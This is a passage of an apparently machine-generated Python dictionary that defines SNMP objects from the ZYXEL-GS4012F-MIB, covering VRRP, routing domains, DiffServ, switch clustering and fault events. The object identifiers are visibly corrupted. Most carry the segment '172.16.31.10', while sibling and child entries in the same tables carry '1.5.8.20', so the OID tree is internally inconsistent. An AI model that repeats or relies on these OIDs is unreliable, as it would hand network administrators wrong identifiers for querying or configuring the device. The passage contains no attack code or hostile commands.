"oid" : "1.3.6.1.4.1.890.172.16.31.10.29.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"routerDvmrpThreshold" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.29.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"routerIpmcPortSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.30",
}, # node
"routerIpmcPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.30.1",
"status" : "current",
"description" :
"""""",
}, # table
"routerIpmcPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.30.1.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in routerIpmcPortTable.""",
}, # row
"routerIpmcPortEgressUntagVlan" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.30.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerVrrpSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31",
}, # node
"routerVrrpMaxNumber" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""Always set it as 14.""",
}, # scalar
"routerVrrpTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2",
"status" : "current",
"description" :
"""""",
}, # table
"routerVrrpEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1",
"create" : "true",
"status" : "current",
"linkage" : [
"routerDomainIpAddress",
"routerDomainIpMaskBits",
"routerVrrpVirtualID",
"routerVrrpUplinkGateway",
],
"description" :
"""An entry in routerVrrpTable.""",
}, # row
"routerVrrpVirtualID" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerVrrpUplinkGateway" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerVrrpPreempt" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerVrrpInterval" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""1-255""",
}, # column
"routerVrrpPriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""1-254""",
}, # column
"routerVrrpPrimaryVirtualIP" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerVrrpName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.7",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerVrrpSecondaryVirtualIP" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.8",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"rpVrrpRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.2.1.9",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerVrrpDomainTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.3",
"status" : "current",
"description" :
"""""",
}, # table
"routerVrrpDomainEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.3.1",
"status" : "current",
"linkage" : [
"routerDomainIpAddress",
"routerDomainIpMaskBits",
],
"description" :
"""An entry in routerVrrpTable.""",
}, # row
"routerVrrpAuthType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.3.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "0"
},
"simple" : {
"nodetype" : "namednumber",
"number" : "1"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerVrrpAuthKey" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.31.3.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerVrrpStatus" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32",
}, # node
"routerVrrpStatusTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32.1",
"status" : "current",
"description" :
"""""",
}, # table
"routerVrrpStatusEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32.1.1",
"status" : "current",
"linkage" : [
"routerVrrpStatusIpAddress",
"routerVrrpStatusIpMaskBits",
"routerVrrpStatusVirtualID",
],
"description" :
""" """,
}, # row
"routerVrrpStatusIpAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerVrrpStatusIpMaskBits" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerVrrpStatusVirtualID" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerVrrpStatusVRStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerVrrpStatusUpLinkStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.32.1.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerDomainSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33",
}, # node
"routerDomainTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.1",
"status" : "current",
"description" :
"""""",
}, # table
"routerDomainEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.1.1",
"status" : "current",
"linkage" : [
"routerDomainIpAddress",
"routerDomainIpMaskBits",
],
"description" :
"""An entry in routerDomainTable.""",
}, # row
"routerDomainIpAddress" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.33.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-SMI", "name" : "IpAddress"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerDomainIpMaskBits" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
      "oid" : "1.3.6.1.4.1.890.1.5.8.20.33.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerDomainVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.33.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"routerDomainIpTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.2",
"status" : "current",
"description" :
"""""",
}, # table
"routerDomainIpEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.2.1",
"status" : "current",
"linkage" : [
"routerDomainIpAddress",
"routerDomainIpMaskBits",
],
"description" :
"""An entry in routerDomainIpTable.""",
}, # row
"routerDomainIpRipDirection" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.2.1.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "0"
},
"outgoing" : {
"nodetype" : "namednumber",
"number" : "1"
},
"incoming" : {
"nodetype" : "namednumber",
"number" : "2"
},
"both" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerDomainIpRipVersion" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.2.1.2",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"v1" : {
"nodetype" : "namednumber",
"number" : "0"
},
"v2b" : {
"nodetype" : "namednumber",
"number" : "1"
},
"v2m" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerDomainIpIgmpVersion" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.2.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "0"
},
"igmp_v1" : {
"nodetype" : "namednumber",
"number" : "1"
},
"igmp_v2" : {
"nodetype" : "namednumber",
"number" : "2"
},
"igmp_v3" : {
"nodetype" : "namednumber",
"number" : "3"
},
},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"routerDomainIpDvmrp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.33.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"diffservSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34",
}, # node
"diffservState" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # scalar
"diffservMapTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.2",
"status" : "current",
"description" :
"""""",
}, # table
"diffservMapEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.2.1",
"status" : "current",
"linkage" : [
"diffservMapDscp",
],
"description" :
"""An entry in diffservMapTable.""",
}, # row
"diffservMapDscp" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""0-63""",
}, # column
"diffservMapPriority" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readwrite",
"description" :
"""0-7""",
}, # column
"diffservPortTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.3",
"status" : "current",
"description" :
"""""",
}, # table
"diffservPortEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.3.1",
"status" : "current",
"linkage" : [
"dot1dBasePort",
],
"description" :
"""An entry in diffservPortTable.""",
}, # row
"diffservPortState" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.34.3.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"P-BRIDGE-MIB", "name" : "EnabledStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"clusterSetup" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35",
}, # node
"clusterManager" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.1",
}, # node
"clusterMaxNumOfManager" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"clusterManagerTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.1.2",
"status" : "current",
"description" :
"""""",
}, # table
"clusterManagerEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.1.2.1",
"create" : "true",
"status" : "current",
"linkage" : [
"clusterManagerVid",
],
"description" :
"""An entry in clusterManagerTable.""",
}, # row
"clusterManagerVid" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.1.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterManagerName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.1.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"clusterManagerRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.1.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"clusterMembers" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.2",
}, # node
"clusterMaxNumOfMember" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.2.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"clusterMemberTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.2.2",
"status" : "current",
"description" :
"""""",
}, # table
"clusterMemberEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.2.2.1",
"create" : "true",
"status" : "current",
"linkage" : [
"clusterMemberMac",
],
"description" :
"""An entry in clusterMemberTable.""",
}, # row
"clusterMemberMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
      "oid" : "1.3.6.1.4.1.890.1.5.8.20.35.2.2.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "MacAddress"},
},
"access" : "noaccess",
"description" :
"""""",
}, # column
"clusterMemberName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.2.2.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterMemberModel" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.2.2.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterMemberPassword" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.2.2.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"clusterMemberRowStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.2.2.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"SNMPv2-TC", "name" : "RowStatus"},
},
"access" : "readwrite",
"description" :
"""""",
}, # column
"clusterCandidates" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.3",
}, # node
"clusterCandidateTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.3.1",
"status" : "current",
"description" :
"""""",
}, # table
"clusterCandidateEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.3.1.1",
"status" : "current",
"linkage" : [
"clusterCandidateMac",
],
"description" :
"""An entry in clusterCandidateTable.""",
}, # row
"clusterCandidateMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.3.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterCandidateName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.3.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterCandidateModel" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.3.1.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterStatus" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4",
}, # node
"clusterStatusRole" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4.1",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"none" : {
"nodetype" : "namednumber",
"number" : "0"
},
"manager" : {
"nodetype" : "namednumber",
"number" : "1"
},
"member" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"clusterStatusManager" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"clsuterStatusMaxNumOfMember" : {
"nodetype" : "scalar",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""""",
}, # scalar
"clusterStatusMemberTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4.4",
"status" : "current",
"description" :
"""""",
}, # table
"clusterStatusMemberEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4.4.1",
"status" : "current",
"linkage" : [
"clusterStatusMemberMac",
],
"description" :
"""An entry in clusterStatusMemberTable.""",
}, # row
"clusterStatusMemberMac" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4.4.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterStatusMemberName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.4.4.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterStatusMemberModel" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.35.4.4.1.3",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"clusterStatusMemberStatus" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.35.4.4.1.4",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "Enumeration",
"error" : {
"nodetype" : "namednumber",
"number" : "0"
},
"online" : {
"nodetype" : "namednumber",
"number" : "1"
},
"offline" : {
"nodetype" : "namednumber",
"number" : "2"
},
},
},
"access" : "readonly",
"description" :
"""""",
}, # column
"faultMIB" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36",
"status" : "current",
}, # node
"eventObjects" : {
"nodetype" : "node",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1",
}, # node
"eventTable" : {
"nodetype" : "table",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1",
"status" : "current",
"description" :
"""A list of currently active fault events. All faults
of normal type regardless of their severity level
are recorded in the event table. When a normal
type fault is cleared it is deleted from the event
table.""",
}, # table
"eventEntry" : {
"nodetype" : "row",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1",
"status" : "current",
"linkage" : [
"eventSeqNum",
],
"description" :
"""An entry containing information about an
event in the event table.""",
}, # row
"eventSeqNum" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.1",
"status" : "current",
"syntax" : {
"type" : { "module" :"", "name" : "Integer32"},
},
"access" : "readonly",
"description" :
"""This variable represents the sequence number of an event.
Sequence number is incremented monotonically starting
from 0 until it reaches its maximum and wraps around back
to 0.
Sequence number is incremented when
- the state of a normal type fault is set on (the same sequence
number is present in the events table as well as in the trap
that is sent to notify about the fault on event)
- delta event occurs (sequence number present in trap message)
- the state of a normal type fault is set off (sequence number
present in trap that is sent to notify for clearing).""",
}, # column
"eventEventId" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.36.1.1.1.2",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "EventIdNumber"},
},
"access" : "readonly",
"description" :
"""This variable represents the event ID which uniquely
identifies the event in the entire system.""",
}, # column
"eventName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.3",
"status" : "current",
"syntax" : {
"type" : {
"basetype" : "OctetString",
"parent module" : {
"name" : "RFC1213-MIB",
"type" : "DisplayString",
},
"ranges" : [
{
"min" : "0",
"max" : "40"
},
],
"range" : {
"min" : "0",
"max" : "40"
},
},
},
"access" : "readonly",
"description" :
"""This variable represents the name of the event, for
example 'Ethernet Link Down'""",
}, # column
"eventInstanceType" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.4",
"status" : "current",
"syntax" : {
"type" : { "module" :"ZYXEL-GS4012F-MIB", "name" : "InstanceType"},
},
"access" : "readonly",
"description" :
"""This variable represents the type of InstanceId of a
particular event in the event table. In brief
the instanceType refers to the type of sub-component
generating this event in the system, for example
switch (5). For more details see the textual
conventions section.
AFFECTS: eventInstanceId,
eventInstanceName""",
}, # column
"eventInstanceId" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.1.5.8.20.36.1.1.1.5",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""This variable represents the InstanceId of a particular
event in the event current table. In brief the instanceId
refers to the sub-component generating this event in the
system, for example '1' for port 1. For more details see
the textual conventions section.
DEPENDS ON: eventInstanceType""",
}, # column
"eventInstanceName" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
"oid" : "1.3.6.1.4.1.890.172.16.31.10.36.1.1.1.6",
"status" : "current",
"syntax" : {
"type" : { "module" :"RFC1213-MIB", "name" : "DisplayString"},
},
"access" : "readonly",
"description" :
"""This variable is mainly used to store additional information
about the sub-component that is generating an event. For
example this field may specify what cooling fan is faulty.
DEPENDS ON: eventInstanceType""",
}, # column
"eventSeverity" : {
"nodetype" : "column",
"moduleName" : "ZYXEL-GS4012F-MIB",
